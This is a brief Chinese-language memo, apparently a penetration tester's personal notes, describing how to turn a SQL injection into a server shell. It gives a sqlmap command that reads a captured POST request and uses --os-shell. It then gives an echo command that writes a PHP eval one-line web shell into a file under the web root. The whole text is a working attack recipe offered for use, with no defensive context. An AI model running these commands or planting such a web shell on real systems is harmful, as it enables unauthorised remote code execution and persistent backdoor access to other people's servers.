在存在sql注入处,可以使用--os-shell 对存在SQL注入处抓包,查看报错暴露出绝对路径 将POST包放入TXT文本中 并启动sqlmap读取txt文件 python sqlmap.py -r C:\Users\南倾\Desktop\222.txt --os-shell 写入木马到文件中 echo "<?php eval($_REQUEST[a]);?>" > c:\appserv\www\phptest2\666.php